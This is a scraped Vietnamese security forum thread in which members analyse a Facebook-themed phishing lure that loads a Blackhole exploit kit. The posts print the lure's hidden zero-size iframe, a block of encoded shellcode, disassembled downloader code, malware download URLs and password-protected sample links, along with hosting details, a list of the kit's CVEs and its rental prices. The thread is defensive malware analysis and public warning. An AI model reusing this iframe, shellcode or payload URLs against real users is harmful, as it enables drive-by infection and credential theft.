<![CDATA[Latest posts for the topic "Một dạng fish khá mới"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Một dạng fish khá mới Troy Stein commented on your status: "*** *** ***** ** ****" To see the comment thread, follow the link below: http://www.totaly.de/facebook/?profile.php&id=9037&v=feed&story_fbid=33601747715388 Thanks, The Facebook Team  Tớ bận lắm nhưng ông anh đã nhờ rồi thì có nghĩa là ông cần cho nên tớ ráng táy máy trong giờ ăn trưa thì tìm thấy như sau. 1. www.totaly.de là một trang web có tên miền và host bên Đức. Nội dung của URL ở trên là một cái iframe (hừm.. lại iframe) như sau:
<iframe src="http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486" width="0" height="0"></iframe> <meta HTTP-EQUIV="REFRESH" content="5; url=http://facebook.com/"> 
Điều này chứng nó "nó" sẽ wwwect về http://facebook.com nhưng cái quan trọng là mảng http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486 ở trên. 2. http://fb-sv10.co.uk/main.php?page=95fc4549d83b0486 là một trang có tên miền UK nhưng IP của nó lại là của một hosting bên Nga. Trang này có chứa thông tin sau (đã kèm). 3. Sau một hồi ráng decode (xuyên qua chạy trực tiếp) thì lòi ra một mớ functions như sau (đã đính kèm) nhưng có một đoạn: Code:
function getShellCode() {
        return "%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830%ue240%uebfa%ue805
%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b
%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c
%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469
%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376
%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71
%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7
%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3
%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7
%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e
%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835
%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969
%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b
%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e
%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732
%u4058%u5c5c%u1258%u0707%u4a4e%u5b05%u195e%u0618%u474b%u5d06%u0743%u065f%u4058%u1758%u154e%u184b%u4b19%u0e1d%u154d%u2819%u0028";
    }
Cái đống này toàn là unicode encoded nhưng khị thử decode thằng ACSII nó ra: Code:
䅁䅁荦ﳤ堐줱腦埩胾⠰→￿청ᱝ矁ꍌᡨ梣ꌤ㑘ꍾ⁞ꍎᑶ尫Л용㠽ퟗꎐᡨ滫⸑퍝Ჯ괌巌셹擃繹嶣ꌔᵜ⭐绝庣⬈ᯝ懡푩⮅ᯭ⟳
㢖�⁜⬥棲�㜓칝ꍶ౶ꍎ挤溥ퟄ౼ꌤ⯰ꏵꌬ皃篃ꎅࡀ喨ᬤ⭜쎾ꏛ⁀�ⵂ쁱ힰퟗ퇊⣀⠨瀨䉸䁨⣗⠨ꭸ㇨絸쒣皣ꬸⷫ쯗䝀⡆䀨婝䕄흼ꬾ⃬
삣䧀ퟗ쏗쌪꥚Ⳅ⠩ꔨ౴బ䵚孏泯Ⰼ婞ᨛ泯‌Ԉ࡛䁻⣐⠨绗ꌤᯀ秡泯⠵塟届泯ⴵ䰆䑄泮ℵ焨ᠬ沠ⰵ祩⡂⡂罻⡂绗괼巨䈾笨绗䈬ꬨⓃ흻
Ȿ쌤쌪漻ឨ崨濒ឨ崨䋬䈨ퟖ⁾듀ퟖꛗ♦냄ꋖꄦ⥇ᮕꋢ㍳滮ṑܲ䁘屜ቘ܇䩎嬅ᥞؘ䝋崆ٟ݃䁘᝘ᕎᡋ䬙ฝᕍ⠙(
Tới đây bó chiếu luôn. Anh em nào rành cái món javascript decoding, coi thử đoạn trên nó có thể decode ra được cái gì khác không? ]]>
/hvaonline/posts/list/41928.html#261299 /hvaonline/posts/list/41928.html#261299 GMT
Một dạng fish khá mới http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll. Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi. Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll. Kết quả quét = VirusTotal: https://www.virustotal.com/file/adbb143c510ac867ef347c218d2ab5e2af031aabeeb35c9db4829c4e6c5da550/analysis/1334301244/ Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá !]]> /hvaonline/posts/list/41928.html#261304 /hvaonline/posts/list/41928.html#261304 GMT Một dạng fish khá mới

TQN wrote:
Hì hì, có TQN say xỉn này liền anh. Nói ông anh anh chửi, vạch mặt thằng đó đi. Định chơi JavaScript exploit à ? Exploit đó tên JS/Exploit-Blacole.al. Bà con google ra thì thấy. Kết quả phân tích file .php đó đây (nhờ máy làm cho khoẻ cho rồi): http://wepawet.cs.ucsb.edu/view.php?hash=236c22c7ba122ba97cee01ee04017968&type=js loài ra một con downloader: http://fb-sv10.co.uk/w.php?f=c01c5&e=1, được download về %Temp% dir với tên: wpbt0.dll. Em đã chụp được em nó, đang unpack, nhưng giờ phải đi rồi. Anh nói anh anh cô lập máy ngay, ngắt Internet ngay. Tạm thời tháo cất cái ổ cứng đó đi. Nguy hiểm. KAV 2011 của em không phát hiện ra virus trong file main.php và wpbt0.dll. Nay lại lòi ra thêm cái trò comment trên FB = link exploit Integer Overflow của Firefox, browser nữa à ! Kinh thật, đúng là quá lỳ lợm, = mọi giá ! 
Anh chạy cái javascript deobsfucator trên FF trên Linux chỉ để decode cái mới lùng nhùng ở tầng javascript thôi em. Đến cái đoạn nó thảy wpbt0.dll vô "C:\DOCUME~1\Administrator\LOCALS~1\Temp\" thì nó không thực thi được, he he, vì Linux làm gì có C:\ đâu. Rảnh unpack nó đi em rồi thảy lên cho bà con biết mà tránh chớ dân xài FB khá đông. Mà không hiểu sao càng gần ngày lễ lớn anh càng nhận nhiều viruses và emails dễ sợ. Mấy anh nào đó cho em xin hai chữ bình yên với :P, phá em hoài tội nghiệp em. Mới thử đì ass ra cái pseudo code: Code:
void EntryPoint(void) {
        asm{ push       ebp };
        temp_0 = rbp;
        rbp = rsp;
        var_m8 = 0xdf2efc3;
        *0x40b01c = 0x2bb;
        if (*0x40c41c != 0x2d3c4f52) {

            loc_4027c6:
                asm{ adc        dword [ds:0x408774], 0x40CAA9 };
                *0x408770 = *0x408770 - 0x1c1d;
                var_m4 = &var_m12;
                *0x40b0b0 = *0x40b0b0 & 0x78e9;
                *0x40c31c = &var_4;
                *0x408774 = *0x408774 & 0x0;
                goto loc_40280c;
        }

    loc_4027b2:
        *0x408768 = *0x408768 | 0x40b070;
        *0x40c41c = 0x0;
        goto loc_4027c6;

    loc_40280c:
        if (!CARRY(*0x408774 - 0x18)) {
                rax = *0x40c320;
                if (*0x40c320 != 0x0) {

                    loc_402873:
                        *0x40ca9d = *0x40ca9d & 0x0;
                        goto loc_402890;
                }
                rax = 0x0;
                rax = rax + *0x40b07c;
                *0x408760 = *0x408760 + rax + CARRY(rax + *0x40b07c);
                *0x40b0ac = *0x40b0ac | 0x467;
                *0x40c320 = **0x40c31c;
                goto loc_402873;
        }
        if (*0x408774 != 0x1d) {
                goto loc_402801;
        }
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ push       0x6A1C };
        asm{ push       dword [ss:ebp-0x0+var_m12] };
        asm{ call       dword [ds:imp_VerifyVersionInfoW] };
        __FCT_PARAMETER__[0] = var_m12;
        __FCT_PARAMETER__[1] = 0x6a1c;
        __FCT_PARAMETER__[2] = var_m12;

    loc_402801:
        *0x408774 = *0x408774 + 0x1;
        goto loc_40280c;

    loc_402890:
        if (!CARRY(*0x40ca9d - 0x1b)) {
                asm{ sbb        dword [ds:0x40B074], 0x40B07C };
                *0x40c310 = *(*0x40c31c + 0x4);
                *0x40c314 = *(*0x40c31c + 0x8);
                *0x40c318 = *(*0x40c31c + 0xc);
                *0x40c2e0 = *0x40c310;
                *0x40c2e8 = *0x40c318;
                *0x40c2e4 = *0x40c314;
                *0x40c1b0 = 0x40c038;
                *0x40c2ec = var_m4;
                rax = fct_4029ad();
                *var_m4 = **0x40c2ec;
                var_m8 = 0x0;
                if (*0x40c230 != var_m8) {
                        *0x40c228 = *0x40c228 ^ *0x40c230;
                        *0x40c230 = var_m8;
                        **0x40c31c = **0x40c31c + *0x40c228;
                        return;
                }
                else {
                        *0x40c228 = *0x40c230;
                        **0x40c31c = *0x40c320;
                        return;
                }
        }
        else {

            loc_40289d:
                if (*0x40ca9d != 0x6) {

                    loc_4028ba:
                        if (*0x40ca9d != 0x5) {
                                goto loc_402882;
                        }
                        *0x40ca9d = *0x40ca9d + 0x1;
                        goto loc_402882;
                }
                asm{ push       0x37DF };
                asm{ push       0x7323 };
                asm{ call       dword [ds:imp_GetCommProperties] };
                __FCT_PARAMETER__[0] = 0x7323;
                __FCT_PARAMETER__[1] = 0x37df;
                goto loc_4028ba;
        }
        goto loc_40289d;

    loc_402882:
        rax = rax + 0x1;
        *0x40ca9d = rax;
        goto loc_402890;
}
]]>
/hvaonline/posts/list/41928.html#261306 /hvaonline/posts/list/41928.html#261306 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261307 /hvaonline/posts/list/41928.html#261307 GMT Một dạng fish khá mới

TQN wrote:
Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi. Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 
Có khi gặp rồi đấy anh ạ O-) Hình như mấy anh đấy cũng chăm lên hva lắm, thấy 2pic này mở được 1 lúc mà click vào thì link trên đã die rồi.
Forbidden You don't have permission to access /facebook/ on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. 
]]>
/hvaonline/posts/list/41928.html#261310 /hvaonline/posts/list/41928.html#261310 GMT
Một dạng fish khá mới http://pastebin.com/3BbYfFUu Đập vào mắt đầu tiên là kiểu ob giống giống cái js ob của tụi Nga em vừa xem hôm trước: Line: 4,5,6,7 Code:
try{new 123;}catch(fvegern){v="e"+"v"+"a";p="p"+"r"+"o"+"to";}
v+="l";
p+="type";
=> eval , prototype Line: 10 Code:
if(fr)dd=d["getElem"+((1)?"entsB":"")+"yTagName"]("script");
=> getLementsByTagName Line: 29 Code:
if(ch&&fr)qq2=e("q"+"q")[((ch&&fr)?"f"+"romCharC"+"o"+"de":"")];
=> fromCharCode Line 31: Code:
vv=a[((1)?"su":"")+"bs"+"tr"](i,2-1);
=> substr Nó ob ác gớm nhưng chưa lẩn kinh bằng con của tụi Nga. Tối về rảnh vọc tiếp!]]>
/hvaonline/posts/list/41928.html#261312 /hvaonline/posts/list/41928.html#261312 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261313 /hvaonline/posts/list/41928.html#261313 GMT Một dạng fish khá mới

TQN wrote:
Dà, giờ em đi làm rồi, tính về nhà nghỉ một chút mà mấy anh đấy lại làm em mất giấc ngủ trưa rồi. Tội tụi em quá mấy anh. Mấy anh cứ quậy suốt vầy không chán sao. Lòi cái nào ra bị thì bị chụp cái đó mà. Em cũng ngán mấy anh tới tận cổ rồi. Cái wrap đó không phải là code thực đâu anh conmale. Nghi binh bên ngoài đó, phải debug, trace vào thật sâu mới lòi ra code VC++ của mấy anh "người quen mà chưa bao giờ gặp" này. 
Ừa, anh cũng thấy lạ lạ vì thử bằng tay thấy nó chẳng làm khỉ gì hết. Phải từ offset 0x5A00 không em?]]>
/hvaonline/posts/list/41928.html#261314 /hvaonline/posts/list/41928.html#261314 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261319 /hvaonline/posts/list/41928.html#261319 GMT Một dạng fish khá mới /hvaonline/posts/list/41928.html#261321 /hvaonline/posts/list/41928.html#261321 GMT Một dạng fish khá mới

quygia128 wrote:
Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao. File ở đây: http://www.mediafire.com/?wt99t6vpk39kasz Pass là: malware 
Mình vừa unpack file info.exe bạn up lên, a e nào hứng thú thì cùng phân tích nhé: http://www.mediafire.com/?68g3cqkoiqq4zf6 ]]>
/hvaonline/posts/list/41928.html#261322 /hvaonline/posts/list/41928.html#261322 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261323 /hvaonline/posts/list/41928.html#261323 GMT Một dạng fish khá mới /hvaonline/posts/list/41928.html#261324 /hvaonline/posts/list/41928.html#261324 GMT Một dạng fish khá mới

TQN wrote:
Good job onlyida. Cậu hảy mô tả sơ sơ quá trình unpack để lấy được PE nhúng trong info.exe cho bà con biết.  
Thực ra cũng không có gì nhiều để chia sẻ, do ko có code anti nên breakpoint ở VirtualAlloc, VirtualProtect xem nó load file gốc lên khu nào. Giải mã xong thì nó write toàn bộ trở lại imagebase, trace 1 lúc qua đoạn getprocaddress cho IAT của file gốc thì sẽ return về entrypoint => dump + fix IAT :) Bạn này xem qua thì hình như lại Bot thì phải.]]>
/hvaonline/posts/list/41928.html#261327 /hvaonline/posts/list/41928.html#261327 GMT
Một dạng fish khá mới

TQN wrote:
Sao đợt này code phức tạp, mã hoá, obfuscated tùm lum vầy nè. Em có lộn không, sao lại thấy có mùi code cao cấp của hacker Nga trong đây. Chiều giờ nó quần em đuối luôn, sinh EXE trong bộ nhớ và harddisk tá lã, rồi xài code inject để download nữa. Mà lạ là cái máy cùi ngoài xưỡng em, cài MS Essential lại bắt hết. Rầu, nhanh thiệt, mấy anh lại ngồi túc trực HVA này, em wget http://fb-sv10.co.uk/w.php?f=c01c5&e=1 không được, mấy anh chơi xoá mất tiêu rầu. Mới chưa được 2 tiếng đồng hồ. Em lại sơ ý để MS AV xoá mất tiêu file wpbt0.dll nữa rồi. Bà con ai down kịp share lại giúp em cái ! Ngày mai em làm tiếp, làm cho ra. Giờ thì em út gọi đi nhậu mới chết, nói: em làm mồi nhậu cho anh nè, nhớ anh quá. Theo bà con thì ngồi RCE hay đi nhậu đây ? 
Anh còn lưu lại hash MD5 của file wpbt0.dll đó không, CMC InfoSec sẽ tìm giúp HVA nếu có thông tin về hash file. Encyclopedia entry: Exploit:JS/Blacole.O - Learn more about malware - Microsoft Malware Protection Center http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Exploit%3AJS%2FBlacole.O Có vẻ có nhiều phiên bản của wpbt0.dll: wpbt0.dll MD5:06e4528eb8a96a606ee3ea578174fd95 - VirSCAN.org 22% Scanner(s) (8/36) found malware! http://r.virscan.org/11a26eed20fee8a6b5fa777a73a20fd4 WPBT0.DLL - Trojan.Agent/Gen-Reveton | SUPERAntiSpyware http://www.superantispyware.com/malwarefiles/WPBT0.DLL.html ]]>
/hvaonline/posts/list/41928.html#261328 /hvaonline/posts/list/41928.html#261328 GMT
Một dạng fish khá mới JAVA applet; PDF exploit; HCP protocol exploit; VBS script... Sao thấy giống giống đợt trồng trọt ở KBCHN.NET hé :P Em down được 1 số file đang ngâm cứu thử, obfuscate cho dữ vào nhưng mà đường nào rồi cũng dẫn tới Roma thôi hehe -:|-]]> /hvaonline/posts/list/41928.html#261330 /hvaonline/posts/list/41928.html#261330 GMT Một dạng fish khá mới

quygia128 wrote:
Em không tải được file wpbt0.dll, KIS 2012 nó chặn địa chỉ này, tắt KIS dow từ http://fb-sv10.co.uk/w.php?f=c01c5&e=1 được 1 file info.exe file này hình như code bằng Delphi, không biết đang chơi trò gì nữa, không lẽ có random nứa sao. File ở đây: http://www.mediafire.com/?wt99t6vpk39kasz Pass là: malware 

Sao lại có Spyeye và Zbot ở đây, stl ("Sinh Tử Lệnh") chôm hàng của hacker Nga à? Trojan.Spyeye!conf [Symantec] PWS-Spyeye!conf [McAfee] TSPY_EYECONF.SM3 [Trend Micro] Troj/SpyEyeCn-A [Sophos]]]>
/hvaonline/posts/list/41928.html#261332 /hvaonline/posts/list/41928.html#261332 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261337 /hvaonline/posts/list/41928.html#261337 GMT Một dạng fish khá mới

TQN wrote:
Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 
:-/ để ý thì thấy anh em với nhau cả]]>
/hvaonline/posts/list/41928.html#261342 /hvaonline/posts/list/41928.html#261342 GMT
Một dạng fish khá mới

vikjava wrote:

TQN wrote:
Hay là hacker Nga, TQ, VN share nhau kỹ thuật đây ? 
:-/ để ý thì thấy anh em với nhau cả 
Em nghĩ là chôm hàng cả thôi, chẳng có bắt tay share nhau kỹ thuật nào với hacker quốc tế cả, cũng chẳng phải bọn Trung Quốc nốt, chỉ là người Việt Nam được nuôi béo để theo lệnh mà hãm hại người vô tội là đồng bào Việt Nam thôi :-) . Anh rongchaua và người anh của anh conmale đều gặp các tấn công tinh vi có chủ đích. Anh rongchaua thì đang ở nước ngoài rồi, chắc cũng được liệt vào tầm ngắm của đám Sinh Tử Lệnh này. Theo bolzano_1989 thì đám stl ("Sinh Tử Lệnh") lần này chôm Blackhole exploit kit bản 1.2.2 (được release trong tháng 2 2012) hoặc bản 1.2.3 (được release trong tháng 3 2012): BH EK 1.2.3 Exploit - Pastebin.com http://pastebin.com/2LrmqiLa Bạn đọc chú ý sẽ thấy PluginDetect version của cả bản exploit kit được dùng ở trên và Blackhole exploit kit bản 1.2.2 hoặc bản 1.2.3 đều là "0.7.6" ;) . Về Blackhole exploit kit, bạn đọc có thể tham khảo các tài liệu kĩ thuật sau: Sophos Technical Paper: Exploring the Blackhole Exploit Kit, March 2012 http://sophosnews.files.wordpress.com/2012/03/blackhole_paper_mar2012.pdf Inside Blackhole Exploit Kit HTML http://lumenasrt.files.wordpress.com/2012/02/20120227_1436_inside_blackhole_html_v0nsch3lling.pdf]]>
/hvaonline/posts/list/41928.html#261347 /hvaonline/posts/list/41928.html#261347 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261350 /hvaonline/posts/list/41928.html#261350 GMT Một dạng fish khá mới /hvaonline/posts/list/41928.html#261353 /hvaonline/posts/list/41928.html#261353 GMT Một dạng fish khá mới

TQN wrote:
Quân ta bây giờ cũng đông, thiện chiến không kém gì mấy anh em kia rồi. Ha ha, say rồi, nói đùa vài câu cho vui. Giờ thì em đã yên tâm gác kiếm ! 
theo e thấy a k0 dễ gác kiếm đc đâu, ít nhất thì làm blog share tut như a kienmanowar đã :P. Mà e thấy mấy bạn cố nhân này cũng chịu khó "lăn lộn" trong UG, các forum để kiếm hàng phết =))]]>
/hvaonline/posts/list/41928.html#261361 /hvaonline/posts/list/41928.html#261361 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261374 /hvaonline/posts/list/41928.html#261374 GMT Một dạng fish khá mới fb-sv02.com fb-sv03.co.uk fb-sv04.co.uk fb-sv05.co.uk fb-sv06.co.uk fb-sv07.co.uk fb-sv08.co.uk fb-sv09.co.uk fb-sv10.co.uk 1. Thông tin người đăng ký:
Registrant: Annette Kathleen Fisher Registrant type: UK Individual Registrant's address: 183 Albion Way Verwood Dorset BH31 7LT United Kingdom Registrar: Fasthosts Internet Ltd [Tag = LIVEDOMAINS] URL: http://www.fasthosts.co.uk 
2. Thông tin kết nối port:
fb-sv07.co.uk Port 22: SSH-2.0-OpenSSH_5.3 Port 80: nginx/0.8.54 ---> http://fb-sv07.co.uk/installation/index.php ;-) fb-sv09.co.uk Port 22: SSH-2.0-OpenSSH_5.1p1 Debian-5 Port 80: Server: nginx/0.6.32 fb-sv10.co.uk Port 22: SSH-2.0-OpenSSH_5.4p1_hpn13v11 FreeBSD-20100308 Port 25: 220 alexander2kupalo.ru ESMTP Sendmail 8.14.5/8.14.5; Sat, 14 Apr 2012 05:51:09 GMT Port 80: Server: nginx/1.1.18  
3. Thông tin hosting:
fb-sv07.co.uk (83.69.226.219) LTD AWAX Telecom Moscow, Orlovo-Davydovsky per., 2/5 str 129110 Moscow, Russia +7 495 6264747 +7 495 6264747 fb-sv10.co.uk (79.137.213.115) Digital Network NOC 13a, Yaroslavskaya st., Moscow, Russia, 129366 +7 495 660 8383 +7 495 660 8383 fb-sv02.com (146.185.249.34) Petersburg Internet Network ltd. PIN ROLE Russia, SPb, Sedova 80  
4. Reference:
http://google.com/safebrowsing/diagnostic?site=zaminnews.com/ Malicious software is hosted on 5 domain(s), including fb-sv06.co.uk/, fb-sv04.co.uk/, fb-sv02.com/. 1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including fb-sv02.com/ http://google.com/safebrowsing/diagnostic?site=eccie.net/ Malicious software includes 35 trojan(s), 31 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine. Malicious software is hosted on 3 domain(s), including nl.ai/, update-kb18628311.com/, fb-sv03.co.uk/. http://google.com/safebrowsing/diagnostic?site=update-kb18628311.com/ Malicious software includes 92 trojan(s), 48 scripting exploit(s).  
Theo em thì chắc đây là một tổ chức hacker đánh thuê của Nga :) Còn STL có thuê bọn này hay không thì chúng ta cần analyze tiếp dựa trên thông tin tài khoản Facebook đã post comment và payload (info.exe) của BlackHole Kit.]]>
/hvaonline/posts/list/41928.html#261376 /hvaonline/posts/list/41928.html#261376 GMT
Một dạng fish khá mới BlackHole Exploit Kit được cài trên máy chủ fb-sv10.co.uk: 1. Các exploit được sử dụng để phát tán malware phiên bản 1.x.x:
CVE-2006-0003 MS06-014 for lE6/Microsoft Data Access Components (MDAC) Remote Code Execution CVE-2007-5659/2008-0655 PDF Exploit -collab, collectEmaillnfo CVE-2008-2992 PDF Exploit• util.printf CVE-2009-0927 PDF Exploit- collab.getlcon CVE-2010-0188 PDF Exploit - LibTiff Integer Overflow CVE-2010-0842 JAVA MIDI Java OBE Unspecified vulnerability in the Sound component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, 1.4.2_25, and 1.3.1_27 CVE-2010-1885 Help Center URL Validation Vulnerability CVE-2011-0559 Flash 10 by exm Denial of service (memory corruption) via crafted parameters CVE-2011-3544 Vulnerability in the Rhino Script Engine CVE-2012-0507 Java Atomic CVE-2010-0840 JAVA TC (?) javagetval OBE Java invoke / Java Trust Trusted Method Chaining - Java getValue Remote Code Execution CVE-2010-0886 Java SMB / Java JDT in Oracle Java SE and Java for Business JDK and JRE 6 Upd 10-19 * Requires xtra components CVE-2010-3552 JAVA SKYLINE Unspecified vulnerability in the New Java Plug-in – Java 6 < Update 22 – IE Only – ALL Windows 
2. Minh họa: http://labs.m86security.com/wp-content/uploads/2011/12/blackhole12.png
Blackhole Exploit Kit control panel http://imperva.typepad.com/.a/6a01156f8c7ad8970c0162fdb83241970d-pi
3. Giá bán/cho thuê: -:-)
1,500 usd/1 năm 1,000 usd/6 tháng 700 usd/3 tháng 
4. Reference:
Danh sách các Exploit Kit và CVE: http://www.mediafire.com/?vwizwswtwx9p1q3 Deconstructing the Black Hole Exploit Kit http://blog.imperva.com/2011/12/deconstructing-the-black-hole-exploit-kit.html Blackhole 1.2.3 released http://xylibox.blogspot.com/2012/03/blackhole-v123.html ...in config.php change value of 'ExploitsDir' to 'data'(old value was 'content'). 
]]>
/hvaonline/posts/list/41928.html#261380 /hvaonline/posts/list/41928.html#261380 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261393 /hvaonline/posts/list/41928.html#261393 GMT Một dạng fish khá mới http://www.threatexpert.com/report.aspx?md5=46a69641d00f656e5e9b6fedd12f96f3 Trojan này còn hook 1 số hàm API tương đối đặc biệt: 1. Trước khi chạy info.exe

 
2. Các process bị hooked sau khi chạy info.exe

 
]]>
/hvaonline/posts/list/41928.html#261412 /hvaonline/posts/list/41928.html#261412 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261427 /hvaonline/posts/list/41928.html#261427 GMT Một dạng fish khá mới /hvaonline/posts/list/41928.html#261431 /hvaonline/posts/list/41928.html#261431 GMT Một dạng fish khá mới "Russia mercenaries" với info.exe:
bannersintpro.org/files/97d19 ligaworldtraders.org/files/97d19 perskitest.org/files/97d19 tartcompanyltd.com/files/97d19  
http://www.mediafire.com/download.php?sf59eb1m6txlbb8 Pass: 123

 
Kết hợp với kết quả RCE của anh TQN thì có thể thấy sự việc như thế này: "ai đó" đã thuê "Russia mercenaries" phát tán trojan (exe hoặc dll), khi nhận được file này thì hacker Nga sẽ nhúng trojan này vào exe engine của họ, engine này có chức năng che dấu trojan của của người thuê (bằng cách hook 1 số hàm API đặc biệt như đã capture ở trên: NtQueryDirectoryFile, NtVdmControl, NtResumeThread,...), sau đó thì họ dùng BlackHole Exploit Kit hoặc các bộ Kit khác để phát tán "sản phẩm cuối cùng" qua mail phishing web, facebook...]]>
/hvaonline/posts/list/41928.html#261444 /hvaonline/posts/list/41928.html#261444 GMT
Một dạng fish khá mới SpyEye steals your data. Even in a limited account http://www.prevx.com/blog/149/SpyEye-steals-your-data-Even-in-a-limited-account.html It is a new toolkit called SpyEye.
After this it injects its code inside all the processes it could get access. In every infected process it hooks the following Windows APIs: CryptEncrypt,LdrLoadDll,NtEnumerateValueKey,NtQueryDirectoryFile,NtResumeThread,NtVdmControl This allows the trojan to hide its folder and its registry key from the user's eyes and antivirus software, implementing user mode rootkit techniques. Inside browser processes, the trojan hooks even the following APIs: TranslateMessage,send,HttpSendRequestA,HttpSendRequestW,InternetCloseHandle By doing so, it's able to steal all sensitive data going out through the browser session, even SSL encrypted web pages. Using this technique it is even able to conceptually bypass classic anti-keyloggers that encrypt keystrokes.  
Win32/Spy.SpyEye.B http://www.eset.eu/encyclopaedia/win32-spy-spyeye-b-trojan-pincav-shd-backdoor]]>
/hvaonline/posts/list/41928.html#261445 /hvaonline/posts/list/41928.html#261445 GMT
Một dạng fish khá mới /hvaonline/posts/list/41928.html#261456 /hvaonline/posts/list/41928.html#261456 GMT Một dạng fish khá mới /hvaonline/posts/list/41928.html#261470 /hvaonline/posts/list/41928.html#261470 GMT